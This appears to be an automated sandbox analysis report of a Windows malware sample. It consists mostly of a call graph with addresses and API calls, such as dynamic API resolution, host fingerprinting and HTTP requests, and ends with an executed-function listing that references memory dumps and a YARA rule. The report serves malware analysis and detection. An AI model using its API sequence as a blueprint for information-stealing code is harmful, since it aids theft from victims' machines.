26450 444a60 2 API calls 26449->26450 26451 44377a 26450->26451 26452 444a60 2 API calls 26451->26452 26453 443793 26452->26453 26454 444a60 2 API calls 26453->26454 26455 4437a9 26454->26455 26456 444a60 2 API calls 26455->26456 26457 4437bf 26456->26457 26458 444a60 2 API calls 26457->26458 26459 4437d5 26458->26459 26460 444a60 2 API calls 26459->26460 26461 4437eb 26460->26461 26462 444a60 2 API calls 26461->26462 26463 443801 26462->26463 26464 444a60 2 API calls 26463->26464 26465 44381a 26464->26465 26466 444a60 2 API calls 26465->26466 26467 443830 26466->26467 26468 444a60 2 API calls 26467->26468 26469 443846 26468->26469 26470 444a60 2 API calls 26469->26470 26471 44385c 26470->26471 26472 444a60 2 API calls 26471->26472 26473 443872 26472->26473 26474 444a60 2 API calls 26473->26474 26475 443888 26474->26475 26476 444a60 2 API calls 26475->26476 26477 4438a1 26476->26477 26478 444a60 2 API calls 26477->26478 26479 4438b7 26478->26479 26480 444a60 2 API calls 26479->26480 26481 4438cd 26480->26481 26482 444a60 2 API calls 26481->26482 26483 4438e3 26482->26483 26484 444a60 2 API calls 26483->26484 26485 4438f9 26484->26485 26486 444a60 2 API calls 26485->26486 26487 44390f 26486->26487 26488 444a60 2 API calls 26487->26488 26489 443928 26488->26489 26490 444a60 2 API calls 26489->26490 26491 44393e 26490->26491 26492 444a60 2 API calls 26491->26492 26493 443954 26492->26493 26494 444a60 2 API calls 26493->26494 26495 44396a 26494->26495 26496 444a60 2 API calls 26495->26496 26497 443980 26496->26497 26498 444a60 2 API calls 26497->26498 26499 443996 26498->26499 26500 444a60 2 API calls 26499->26500 26501 4439af 26500->26501 26502 444a60 2 API calls 26501->26502 26503 4439c5 26502->26503 26504 444a60 2 API calls 26503->26504 26505 4439db 26504->26505 26506 444a60 2 API calls 26505->26506 26507 4439f1 26506->26507 26508 444a60 2 API calls 26507->26508 26509 443a07 26508->26509 26510 444a60 2 API calls 26509->26510 26511 443a1d 26510->26511 26512 444a60 2 API calls 26511->26512 26513 443a36 26512->26513 26514 444a60 2 API calls 26513->26514 26515 443a4c 26514->26515 26516 444a60 2 API calls 26515->26516 26517 443a62 26516->26517 26518 444a60 2 API calls 26517->26518 26519 443a78 26518->26519 26520 444a60 2 API calls 26519->26520 26521 443a8e 26520->26521 26522 444a60 2 API calls 26521->26522 26523 443aa4 26522->26523 26524 444a60 2 API calls 26523->26524 26525 443abd 26524->26525 26526 444a60 2 API calls 26525->26526 26527 443ad3 26526->26527 26528 444a60 2 API calls 26527->26528 26529 443ae9 26528->26529 26530 444a60 2 API calls 26529->26530 26531 443aff 26530->26531 26532 444a60 2 API calls 26531->26532 26533 443b15 26532->26533 26534 444a60 2 API calls 26533->26534 26535 443b2b 26534->26535 26536 444a60 2 API calls 26535->26536 26537 443b44 26536->26537 26538 444a60 2 API calls 26537->26538 26539 443b5a 26538->26539 26540 444a60 2 API calls 26539->26540 26541 443b70 26540->26541 26542 444a60 2 API calls 26541->26542 26543 443b86 26542->26543 26544 444a60 2 API calls 26543->26544 26545 443b9c 26544->26545 26546 444a60 2 API calls 26545->26546 26547 443bb2 26546->26547 26548 444a60 2 API calls 26547->26548 26549 443bcb 26548->26549 26550 444a60 2 API calls 26549->26550 26551 443be1 26550->26551 26552 444a60 2 API calls 26551->26552 26553 443bf7 26552->26553 26554 444a60 2 API calls 26553->26554 26555 443c0d 26554->26555 26556 444a60 2 API calls 26555->26556 26557 443c23 26556->26557 26558 444a60 2 API calls 26557->26558 26559 443c39 26558->26559 26560 444a60 2 API calls 26559->26560 26561 443c52 26560->26561 26562 444a60 2 API calls 26561->26562 26563 443c68 26562->26563 26564 444a60 2 API calls 26563->26564 26565 443c7e 26564->26565 26566 444a60 2 API calls 26565->26566 26567 443c94 26566->26567 26568 444a60 2 API calls 26567->26568 26569 443caa 26568->26569 26570 444a60 2 API calls 26569->26570 26571 443cc0 26570->26571 26572 444a60 2 API calls 26571->26572 26573 443cd9 26572->26573 26574 444a60 2 API calls 26573->26574 26575 443cef 26574->26575 26576 444a60 2 API calls 26575->26576 26577 443d05 26576->26577 26578 444a60 2 API calls 26577->26578 26579 443d1b 26578->26579 26580 444a60 2 API calls 26579->26580 26581 443d31 26580->26581 26582 444a60 2 API calls 26581->26582 26583 443d47 26582->26583 26584 444a60 2 API calls 26583->26584 26585 443d60 26584->26585 26586 444a60 2 API calls 26585->26586 26587 443d76 26586->26587 26588 444a60 2 API calls 26587->26588 26589 443d8c 26588->26589 26590 444a60 2 API calls 26589->26590 26591 443da2 26590->26591 26592 444a60 2 API calls 26591->26592 26593 443db8 26592->26593 26594 444a60 2 API calls 26593->26594 26595 443dce 26594->26595 26596 444a60 2 API calls 26595->26596 26597 443de7 26596->26597 26598 444a60 2 API calls 26597->26598 26599 443dfd 26598->26599 26600 444a60 2 API calls 26599->26600 26601 443e13 26600->26601 26602 444a60 2 API calls 26601->26602 26603 443e29 26602->26603 26604 444a60 2 API calls 26603->26604 26605 443e3f 26604->26605 26606 444a60 2 API calls 26605->26606 26607 443e55 26606->26607 26608 444a60 2 API calls 26607->26608 26609 443e6e 26608->26609 26610 444a60 2 API calls 26609->26610 26611 443e84 26610->26611 26612 444a60 2 API calls 26611->26612 26613 443e9a 26612->26613 26614 444a60 2 API calls 26613->26614 26615 443eb0 26614->26615 26616 444a60 2 API calls 26615->26616 26617 443ec6 26616->26617 26618 444a60 2 API calls 26617->26618 26619 443edc 26618->26619 26620 444a60 2 API calls 26619->26620 26621 443ef5 26620->26621 26622 444a60 2 API calls 26621->26622 26623 443f0b 26622->26623 26624 444a60 2 API calls 26623->26624 26625 443f21 26624->26625 26626 444a60 2 API calls 26625->26626 26627 443f37 26626->26627 26628 444a60 2 API calls 26627->26628 26629 443f4d 26628->26629 26630 444a60 2 API calls 26629->26630 26631 443f63 26630->26631 26632 444a60 2 API calls 26631->26632 26633 443f7c 26632->26633 26634 444a60 2 API calls 26633->26634 26635 443f92 26634->26635 26636 444a60 2 API calls 26635->26636 26637 443fa8 26636->26637 26638 444a60 2 API calls 26637->26638 26639 443fbe 26638->26639 26640 444a60 2 API calls 26639->26640 26641 443fd4 26640->26641 26642 444a60 2 API calls 26641->26642 26643 443fea 26642->26643 26644 444a60 2 API calls 26643->26644 26645 444003 26644->26645 26646 444a60 2 API calls 26645->26646 26647 444019 26646->26647 26648 444a60 2 API calls 26647->26648 26649 44402f 26648->26649 26650 444a60 2 API calls 26649->26650 26651 444045 26650->26651 26652 444a60 2 API calls 26651->26652 26653 44405b 26652->26653 26654 444a60 2 API calls 26653->26654 26655 444071 26654->26655 26656 444a60 2 API calls 26655->26656 26657 44408a 26656->26657 26658 444a60 2 API calls 26657->26658 26659 4440a0 26658->26659 26660 444a60 2 API calls 26659->26660 26661 4440b6 26660->26661 26662 444a60 2 API calls 26661->26662 26663 4440cc 26662->26663 26664 444a60 2 API calls 26663->26664 26665 4440e2 26664->26665 26666 444a60 2 API calls 26665->26666 26667 4440f8 26666->26667 26668 444a60 2 API calls 26667->26668 26669 444111 26668->26669 26670 444a60 2 API calls 26669->26670 26671 444127 26670->26671 26672 444a60 2 API calls 26671->26672 26673 44413d 26672->26673 26674 444a60 2 API calls 26673->26674 26675 444153 26674->26675 26676 444a60 2 API calls 26675->26676 26677 444169 26676->26677 26678 444a60 2 API calls 26677->26678 26679 44417f 26678->26679 26680 444a60 2 API calls 26679->26680 26681 444198 26680->26681 26682 444a60 2 API calls 26681->26682 26683 4441ae 26682->26683 26684 444a60 2 API calls 26683->26684 26685 4441c4 26684->26685 26686 444a60 2 API calls 26685->26686 26687 4441da 26686->26687 26688 444a60 2 API calls 26687->26688 26689 4441f0 26688->26689 26690 444a60 2 API calls 26689->26690 26691 444206 26690->26691 26692 444a60 2 API calls 26691->26692 26693 44421f 26692->26693 26694 444a60 2 API calls 26693->26694 26695 444235 26694->26695 26696 444a60 2 API calls 26695->26696 26697 44424b 26696->26697 26698 444a60 2 API calls 26697->26698 26699 444261 26698->26699 26700 444a60 2 API calls 26699->26700 26701 444277 26700->26701 26702 444a60 2 API calls 26701->26702 26703 44428d 26702->26703 26704 444a60 2 API calls 26703->26704 26705 4442a6 26704->26705 26706 444a60 2 API calls 26705->26706 26707 4442bc 26706->26707 26708 444a60 2 API calls 26707->26708 26709 4442d2 26708->26709 26710 444a60 2 API calls 26709->26710 26711 4442e8 26710->26711 26712 444a60 2 API calls 26711->26712 26713 4442fe 26712->26713 26714 444a60 2 API calls 26713->26714 26715 444314 26714->26715 26716 444a60 2 API calls 26715->26716 26717 44432d 26716->26717 26718 444a60 2 API calls 26717->26718 26719 444343 26718->26719 26720 444a60 2 API calls 26719->26720 26721 444359 26720->26721 26722 444a60 2 API calls 26721->26722 26723 44436f 26722->26723 26724 444a60 2 API calls 26723->26724 26725 444385 26724->26725 26726 444a60 2 API calls 26725->26726 26727 44439b 26726->26727 26728 444a60 2 API calls 26727->26728 26729 4443b4 26728->26729 26730 444a60 2 API calls 26729->26730 26731 4443ca 26730->26731 26732 444a60 2 API calls 26731->26732 26733 4443e0 26732->26733 26734 444a60 2 API calls 26733->26734 26735 4443f6 26734->26735 26736 444a60 2 API calls 26735->26736 26737 44440c 26736->26737 26738 444a60 2 API calls 26737->26738 26739 444422 26738->26739 26740 444a60 2 API calls 26739->26740 26741 44443b 26740->26741 26742 444a60 2 API calls 26741->26742 26743 444451 26742->26743 26744 444a60 2 API calls 26743->26744 26745 444467 26744->26745 26746 444a60 2 API calls 26745->26746 26747 44447d 26746->26747 26748 444a60 2 API calls 26747->26748 26749 444493 26748->26749 26750 444a60 2 API calls 26749->26750 26751 4444a9 26750->26751 26752 444a60 2 API calls 26751->26752 26753 4444c2 26752->26753 26754 444a60 2 API calls 26753->26754 26755 4444d8 26754->26755 26756 444a60 2 API calls 26755->26756 26757 4444ee 26756->26757 26758 444a60 2 API calls 26757->26758 26759 444504 26758->26759 26760 444a60 2 API calls 26759->26760 26761 44451a 26760->26761 26762 444a60 2 API calls 26761->26762 26763 444530 26762->26763 26764 444a60 2 API calls 26763->26764 26765 444549 26764->26765 26766 444a60 2 API calls 26765->26766 26767 44455f 26766->26767 26768 444a60 2 API calls 26767->26768 26769 444575 26768->26769 26770 444a60 2 API calls 26769->26770 26771 44458b 26770->26771 26772 444a60 2 API calls 26771->26772 26773 4445a1 26772->26773 26774 444a60 2 API calls 26773->26774 26775 4445b7 26774->26775 26776 444a60 2 API calls 26775->26776 26777 4445d0 26776->26777 26778 444a60 2 API calls 26777->26778 26779 4445e6 26778->26779 26780 444a60 2 API calls 26779->26780 26781 4445fc 26780->26781 26782 444a60 2 API calls 26781->26782 26783 444612 26782->26783 26784 444a60 2 API calls 26783->26784 26785 444628 26784->26785 26786 444a60 2 API calls 26785->26786 26787 44463e 26786->26787 26788 444a60 2 API calls 26787->26788 26789 444657 26788->26789 26790 444a60 2 API calls 26789->26790 26791 44466d 26790->26791 26792 444a60 2 API calls 26791->26792 26793 444683 26792->26793 26794 444a60 2 API calls 26793->26794 26795 444699 26794->26795 26796 444a60 2 API calls 26795->26796 26797 4446af 26796->26797 26798 444a60 2 API calls 26797->26798 26799 4446c5 26798->26799 26800 444a60 2 API calls 26799->26800 26801 4446de 26800->26801 26802 444a60 2 API calls 26801->26802 26803 4446f4 26802->26803 26804 444a60 2 API calls 26803->26804 26805 44470a 26804->26805 26806 444a60 2 API calls 26805->26806 26807 444720 26806->26807 26808 444a60 2 API calls 26807->26808 26809 444736 26808->26809 26810 444a60 2 API calls 26809->26810 26811 44474c 26810->26811 26812 444a60 2 API calls 26811->26812 26813 444765 26812->26813 26814 444a60 2 API calls 26813->26814 26815 44477b 26814->26815 26816 444a60 2 API calls 26815->26816 26817 444791 26816->26817 26818 444a60 2 API calls 26817->26818 26819 4447a7 26818->26819 26820 444a60 2 API calls 26819->26820 26821 4447bd 26820->26821 26822 444a60 2 API calls 26821->26822 26823 4447d3 26822->26823 26824 444a60 2 API calls 26823->26824 26825 4447ec 26824->26825 26826 444a60 2 API calls 26825->26826 26827 444802 26826->26827 26828 444a60 2 API calls 26827->26828 26829 444818 26828->26829 26830 444a60 2 API calls 26829->26830 26831 44482e 26830->26831 26832 444a60 2 API calls 26831->26832 26833 444844 26832->26833 26834 444a60 2 API calls 26833->26834 26835 44485a 26834->26835 26836 444a60 2 API calls 26835->26836 26837 444873 26836->26837 26838 444a60 2 API calls 26837->26838 26839 444889 26838->26839 26840 444a60 2 API calls 26839->26840 26841 44489f 26840->26841 26842 444a60 2 API calls 26841->26842 26843 4448b5 26842->26843 26844 444a60 2 API calls 26843->26844 26845 4448cb 26844->26845 26846 444a60 2 API calls 26845->26846 26847 4448e1 26846->26847 26848 444a60 2 API calls 26847->26848 26849 4448fa 26848->26849 26850 444a60 2 API calls 26849->26850 26851 444910 26850->26851 26852 444a60 2 API calls 26851->26852 26853 444926 26852->26853 26854 444a60 2 API calls 26853->26854 26855 44493c 26854->26855 26856 444a60 2 API calls 26855->26856 26857 444952 26856->26857 26858 444a60 2 API calls 26857->26858 26859 444968 26858->26859 26860 444a60 2 API calls 26859->26860 26861 444981 26860->26861 26862 444a60 2 API calls 26861->26862 26863 444997 26862->26863 26864 444a60 2 API calls 26863->26864 26865 4449ad 26864->26865 26866 444a60 2 API calls 26865->26866 26867 4449c3 26866->26867 26868 444a60 2 API calls 26867->26868 26869 4449d9 26868->26869 26870 444a60 2 API calls 26869->26870 26871 4449ef 26870->26871 26872 444a60 2 API calls 26871->26872 26873 444a08 26872->26873 26874 444a60 2 API calls 26873->26874 26875 444a1e 26874->26875 26876 444a60 2 API calls 26875->26876 26877 444a34 26876->26877 26878 444a60 2 API calls 26877->26878 26879 444a4a 26878->26879 26880 4666e0 26879->26880 26881 466afe 8 API calls 26880->26881 26882 4666ed 43 API calls 26880->26882 26883 466b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26881->26883 26884 466c08 26881->26884 26882->26881 26883->26884 26885 466c15 8 API calls 26884->26885 26886 466cd2 26884->26886 26885->26886 26887 466d4f 26886->26887 26888 466cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26886->26888 26889 466d5c 6 API calls 26887->26889 26890 466de9 26887->26890 26888->26887 26889->26890 26891 466df6 12 API calls 26890->26891 26892 466f10 26890->26892 26891->26892 26893 466f8d 26892->26893 26894 466f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26892->26894 26895 466f96 GetProcAddress GetProcAddress 26893->26895 26896 466fc1 26893->26896 26894->26893 26895->26896 26897 466ff5 26896->26897 26898 466fca GetProcAddress GetProcAddress 26896->26898 26899 467002 10 API calls 26897->26899 26900 4670ed 26897->26900 26898->26897 26899->26900 26901 4670f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26900->26901 26902 467152 26900->26902 26901->26902 26903 46716e 26902->26903 26904 46715b GetProcAddress 26902->26904 26905 467177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26903->26905 26906 46051f 26903->26906 26904->26903 26905->26906 26907 441530 26906->26907 27216 441610 26907->27216 26909 44153b 26910 441555 lstrcpy 26909->26910 26911 44155d 26909->26911 26910->26911 26912 441577 lstrcpy 26911->26912 26913 44157f 26911->26913 26912->26913 26914 441599 lstrcpy 26913->26914 26916 4415a1 26913->26916 26914->26916 26915 441605 26918 45f1b0 lstrlen 26915->26918 26916->26915 26917 4415fd lstrcpy 26916->26917 26917->26915 26919 45f1e4 26918->26919 26920 45f1f7 lstrlen 26919->26920 26921 45f1eb lstrcpy 26919->26921 26922 45f208 26920->26922 26921->26920 26923 45f20f lstrcpy 26922->26923 26924 45f21b lstrlen 26922->26924 26923->26924 26925 45f22c 26924->26925 26926 45f233 lstrcpy 26925->26926 26927 45f23f 26925->26927 26926->26927 26928 45f258 lstrcpy 26927->26928 26929 45f264 26927->26929 26928->26929 26930 45f286 lstrcpy 26929->26930 26931 45f292 26929->26931 26930->26931 26932 45f2ba lstrcpy 26931->26932 26933 45f2c6 26931->26933 26932->26933 26934 45f2ea lstrcpy 26933->26934 26985 45f300 26933->26985 26934->26985 26935 45f30c lstrlen 26935->26985 26936 45f4b9 lstrcpy 26936->26985 26937 45f3a1 lstrcpy 26937->26985 26938 45f3c5 lstrcpy 26938->26985 26939 441530 8 API calls 26939->26985 26940 45f4e8 lstrcpy 26999 45f4f0 26940->26999 26941 45ee90 28 API calls 26941->26985 26942 45f479 lstrcpy 26942->26985 26943 45f70f StrCmpCA 26949 45fe8e 26943->26949 26943->26985 26944 45f616 StrCmpCA 26944->26943 26944->26999 26945 45f59c lstrcpy 26945->26999 26946 45fa29 StrCmpCA 26956 45fe2b 26946->26956 26946->26985 26947 45f73e lstrlen 26947->26985 26948 45fd4d StrCmpCA 26952 45fd60 Sleep 26948->26952 26963 45fd75 26948->26963 26950 45fead lstrlen 26949->26950 26951 45fea5 lstrcpy 26949->26951 26955 45fec7 26950->26955 26951->26950 26952->26985 26953 45fa58 lstrlen 26953->26985 26954 45f64a lstrcpy 26954->26999 26961 45fee7 lstrlen 26955->26961 26966 45fedf lstrcpy 26955->26966 26957 45fe4a lstrlen 26956->26957 26958 45fe42 lstrcpy 26956->26958 26965 45fe64 26957->26965 26958->26957 26959 45ee90 28 API calls 26959->26999 26960 45f89e lstrcpy 26960->26985 26976 45ff01 26961->26976 26962 45fd94 lstrlen 26978 45fdae 26962->26978 26963->26962 26967 45fd8c lstrcpy 26963->26967 26964 45f76f lstrcpy 26964->26985 26970 45fdce lstrlen 26965->26970 26972 45fe7c lstrcpy 26965->26972 26966->26961 26967->26962 26968 45fbb8 lstrcpy 26968->26985 26969 45fa89 lstrcpy 26969->26985 26986 45fde8 26970->26986 26971 45f8cd lstrcpy 26971->26999 26972->26970 26973 45f791 lstrcpy 26973->26985 26975 441530 8 API calls 26975->26999 26977 45ff21 26976->26977 26980 45ff19 lstrcpy 26976->26980 26981 441610 4 API calls 26977->26981 26978->26970 26984 45fdc6 lstrcpy 26978->26984 26979 45fbe7 lstrcpy 26979->26999 26980->26977 27002 45fe13 26981->27002 26982 45faab lstrcpy 26982->26985 26983 45f698 lstrcpy 26983->26999 26984->26970 26985->26935 26985->26936 26985->26937 26985->26938 26985->26939 26985->26940 26985->26941 26985->26942 26985->26943 26985->26946 26985->26947 26985->26948 26985->26953 26985->26960 26985->26964 26985->26968 26985->26969 26985->26971 26985->26973 26985->26979 26985->26982 26991 45f7e2 lstrcpy 26985->26991 26994 45fafc lstrcpy 26985->26994 26985->26999 26987 45fe08 26986->26987 26989 45fe00 lstrcpy 26986->26989 26990 441610 4 API calls 26987->26990 26988 45efb0 35 API calls 26988->26999 26989->26987 26990->27002 26991->26985 26992 45f924 lstrcpy 26992->26999 26993 45f99e StrCmpCA 26993->26946 26993->26999 26994->26985 26995 45fc3e lstrcpy 26995->26999 26996 45fcb8 StrCmpCA 26996->26948 26996->26999 26997 45f9cb lstrcpy 26997->26999 26998 45fce9 lstrcpy 26998->26999 26999->26944 26999->26945 26999->26946 26999->26948 26999->26954 26999->26959 26999->26975 26999->26983 26999->26985 26999->26988 26999->26992 26999->26993 26999->26995 26999->26996 26999->26997 26999->26998 27000 45fa19 lstrcpy 26999->27000 27001 45fd3a lstrcpy 26999->27001 27000->26999 27001->26999 27002->26026 27004 462785 27003->27004 27005 46278c GetVolumeInformationA 27003->27005 27004->27005 27006 4627ec GetProcessHeap RtlAllocateHeap 27005->27006 27008 462826 wsprintfA 27006->27008 27009 462822 27006->27009 27008->27009 27226 4671e0 27009->27226 27013 444c70 27012->27013 27014 444c85 27013->27014 27015 444c7d lstrcpy 27013->27015 27230 444bc0 27014->27230 27015->27014 27017 444c90 27018 444ccc lstrcpy 27017->27018 27019 444cd8 27017->27019 27018->27019 27020 444cff lstrcpy 27019->27020 27021 444d0b 27019->27021 27020->27021 27022 444d2f lstrcpy 27021->27022 27023 444d3b 27021->27023 27022->27023 27024 444d6d lstrcpy 27023->27024 27025 444d79 27023->27025 27024->27025 27026 444da0 lstrcpy 27025->27026 27027 444dac InternetOpenA StrCmpCA 27025->27027 27026->27027 27028 444de0 27027->27028 27029 4454b8 InternetCloseHandle CryptStringToBinaryA 27028->27029 27234 463e70 27028->27234 27031 4454e8 LocalAlloc 27029->27031 27035 4455d8 27029->27035 27032 4454ff CryptStringToBinaryA 27031->27032 27031->27035 27033 445517 LocalFree 27032->27033 27034 445529 lstrlen 27032->27034 27033->27035 27036 44553d 27034->27036 27035->26055 27039 445557 lstrcpy 27036->27039 27040 445563 lstrlen 27036->27040 27037 444e38 27042 444e5a lstrcpy 27037->27042 27044 444e62 27037->27044 27038 444dfa 27038->27037 27041 444e23 lstrcpy lstrcat 27038->27041 27039->27040 27043 44557d 27040->27043 27041->27037 27042->27044 27045 44558f lstrcpy lstrcat 27043->27045 27046 4455a2 27043->27046 27047 444e71 lstrlen 27044->27047 27045->27046 27048 4455d1 27046->27048 27050 4455c9 lstrcpy 27046->27050 27049 444e89 27047->27049 27048->27035 27051 444e95 lstrcpy lstrcat 27049->27051 27052 444eac 27049->27052 27050->27048 27051->27052 27053 444ed5 27052->27053 27054 444ecd lstrcpy 27052->27054 27055 444edc lstrlen 27053->27055 27054->27053 27056 444ef2 27055->27056 27057 444efe lstrcpy lstrcat 27056->27057 27058 444f15 27056->27058 27057->27058 27059 444f36 lstrcpy 27058->27059 27060 444f3e 27058->27060 27059->27060 27061 444f65 lstrcpy lstrcat 27060->27061 27062 444f7b 27060->27062 27061->27062 27063 444fa4 27062->27063 27064 444f9c lstrcpy 27062->27064 27065 444fab lstrlen 27063->27065 27064->27063 27066 444fc1 27065->27066 27067 444fcd lstrcpy lstrcat 27066->27067 27068 444fe4 27066->27068 27067->27068 27069 44500d 27068->27069 27070 445005 lstrcpy 27068->27070 27071 445014 lstrlen 27069->27071 27070->27069 27072 44502a 27071->27072 27073 445036 lstrcpy lstrcat 27072->27073 27074 44504d 27072->27074 27073->27074 27075 445079 27074->27075 27076 445071 lstrcpy 27074->27076 27077 445080 lstrlen 27075->27077 27076->27075 27078 44509b 27077->27078 27079 4450ac lstrcpy lstrcat 27078->27079 27080 4450bc 27078->27080 27079->27080 27081 4450da lstrcpy lstrcat 27080->27081 27082 4450ed 27080->27082 27081->27082 27083 44510b lstrcpy 27082->27083 27084 445113 27082->27084 27083->27084 27085 445121 InternetConnectA 27084->27085 27085->27029 27086 445150 HttpOpenRequestA 27085->27086 27087 4454b1 InternetCloseHandle 27086->27087 27088 44518b 27086->27088 27087->27029 27241 467310 lstrlen 27088->27241 27092 4451a4 27249 4672c0 27092->27249 27095 467280 lstrcpy 27096 4451c0 27095->27096 27097 467310 3 API calls 27096->27097 27098 4451d5 27097->27098 27099 467280 lstrcpy 27098->27099 27100 4451de 27099->27100 27101 467310 3 API calls 27100->27101 27102 4451f4 27101->27102 27103 467280 lstrcpy 27102->27103 27104 4451fd 27103->27104 27105 467310 3 API calls 27104->27105 27106 445213 27105->27106 27107 467280 lstrcpy 27106->27107 27108 44521c 27107->27108 27109 467310 3 API calls 27108->27109 27110 445231 27109->27110 27111 467280 lstrcpy 27110->27111 27112 44523a 27111->27112 27113 4672c0 2 API calls 27112->27113 27114 44524d 27113->27114 27115 467280 lstrcpy 27114->27115 27116 445256 27115->27116 27117 467310 3 API calls 27116->27117 27118 44526b 27117->27118 27119 467280 lstrcpy 27118->27119 27120 445274 27119->27120 27121 467310 3 API calls 27120->27121 27122 445289 27121->27122 27123 467280 lstrcpy 27122->27123 27124 445292 27123->27124 27125 4672c0 2 API calls 27124->27125 27126 4452a5 27125->27126 27127 467280 lstrcpy 27126->27127 27128 4452ae 27127->27128 27129 467310 3 API calls 27128->27129 27130 4452c3 27129->27130 27131 467280 lstrcpy 27130->27131 27132 4452cc 27131->27132 27133 467310 3 API calls 27132->27133 27134 4452e2 27133->27134 27135 467280 lstrcpy 27134->27135 27136 4452eb 27135->27136 27137 467310 3 API calls 27136->27137 27138 445301 27137->27138 27139 467280 lstrcpy 27138->27139 27140 44530a 27139->27140 27141 467310 3 API calls 27140->27141 27142 44531f 27141->27142 27143 467280 lstrcpy 27142->27143 27144 445328 27143->27144 27145 4672c0 2 API calls 27144->27145 27146 44533b 27145->27146 27147 467280 lstrcpy 27146->27147 27148 445344 27147->27148 27149 445370 lstrcpy 27148->27149 27150 44537c 27148->27150 27149->27150 27151 4672c0 2 API calls 27150->27151 27152 44538a 27151->27152 27153 4672c0 2 API calls 27152->27153 27154 445397 27153->27154 27155 467280 lstrcpy 27154->27155 27156 4453a1 27155->27156 27157 4453b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27156->27157 27158 44549c InternetCloseHandle 27157->27158 27162 4453f2 27157->27162 27160 4454ae 27158->27160 27159 4453fd lstrlen 27159->27162 27160->27087 27161 44542e lstrcpy lstrcat 27161->27162 27162->27158 27162->27159 27162->27161 27163 445473 27162->27163 27164 44546b lstrcpy 27162->27164 27165 44547a InternetReadFile 27163->27165 27164->27163 27165->27158 27165->27162 27167 458cc6 ExitProcess 27166->27167 27168 458ccd 27166->27168 27169 458ee2 27168->27169 27170 458d84 StrCmpCA 27168->27170 27171 458da4 StrCmpCA 27168->27171 27172 458d06 lstrlen 27168->27172 27173 458e6f StrCmpCA 27168->27173 27174 458e88 lstrlen 27168->27174 27175 458e56 StrCmpCA 27168->27175 27176 458d30 lstrlen 27168->27176 27177 458dbd StrCmpCA 27168->27177 27178 458ddd StrCmpCA 27168->27178 27179 458dfd StrCmpCA 27168->27179 27180 458e1d StrCmpCA 27168->27180 27181 458e3d StrCmpCA 27168->27181 27182 458d5a lstrlen 27168->27182 27183 458ebb lstrcpy 27168->27183 27169->26057 27170->27168 27171->27168 27172->27168 27173->27168 27174->27168 27175->27168 27176->27168 27177->27168 27178->27168 27179->27168 27180->27168 27181->27168 27182->27168 27183->27168 27184->26063 27185->26065 27186->26071 27187->26073 27188->26079 27189->26081 27190->26087 27191->26091 27192->26097 27193->26099 27194->26103 27195->26117 27196->26121 27197->26120 27198->26116 27199->26120 27200->26138 27201->26123 27202->26124 27203->26128 27204->26134 27205->26135 27206->26142 27207->26145 27208->26151 27209->26174 27210->26178 27211->26177 27212->26173 27213->26177 27214->26187 27217 44161f 27216->27217 27218 44162b lstrcpy 27217->27218 27219 441633 27217->27219 27218->27219 27220 44164d lstrcpy 27219->27220 27221 441655 27219->27221 27220->27221 27222 44166f lstrcpy 27221->27222 27224 441677 27221->27224 27222->27224 27223 441699 27223->26909 27224->27223 27225 441691 lstrcpy 27224->27225 27225->27223 27227 4671e6 27226->27227 27228 462860 27227->27228 27229 4671fc lstrcpy 27227->27229 27228->26052 27229->27228 27231 444bd0 27230->27231 27231->27231 27232 444bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27231->27232 27233 444c41 27232->27233 27233->27017 27235 463e83 27234->27235 27236 463e9f lstrcpy 27235->27236 27237 463eab 27235->27237 27236->27237 27238 463ed5 GetSystemTime 27237->27238 27239 463ecd lstrcpy 27237->27239 27240 463ef3 27238->27240 27239->27238 27240->27038 27242 46732d 27241->27242 27243 44519b 27242->27243 27244 46733d lstrcpy lstrcat 27242->27244 27245 467280 27243->27245 27244->27243 27246 46728c 27245->27246 27247 4672b4 27246->27247 27248 4672ac lstrcpy 27246->27248 27247->27092 27248->27247 27250 4672dc 27249->27250 27251 4451b7 27250->27251 27252 4672ef lstrcpy lstrcat 27250->27252 27251->27095 27252->27251 27280 4631f0 GetSystemInfo wsprintfA 27265 45e0f9 140 API calls 27294 456b79 138 API calls 27285 45f2f8 93 API calls 27295 441b64 162 API calls 27306 44bbf9 90 API calls 27266 462880 10 API calls 27267 464480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 27268 463480 6 API calls 27286 463280 7 API calls 27269 458c88 16 API calls 27296 44b309 98 API calls 27277 464e35 6 API calls 27260 462c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27297 469711 10 API calls __setmbcp 27270 46749e memset ctype 27272 452499 290 API calls 27307 44db99 672 API calls 27308 458615 47 API calls 27273 4630a0 GetSystemPowerStatus 27281 4629a0 GetCurrentProcess IsWow64Process 27299 454b29 304 API calls 27309 4523a9 298 API calls 27278 463130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27310 45abb2 120 API calls 27284 44f639 144 API calls 27287 4416b9 200 API calls 27302 44bf39 177 API calls

                        Executed Functions

                        Function 00444C50 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 00444C7F
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00444CD2
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00444D05
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00444D35
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00444D73
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00444DA6
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00444DB6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
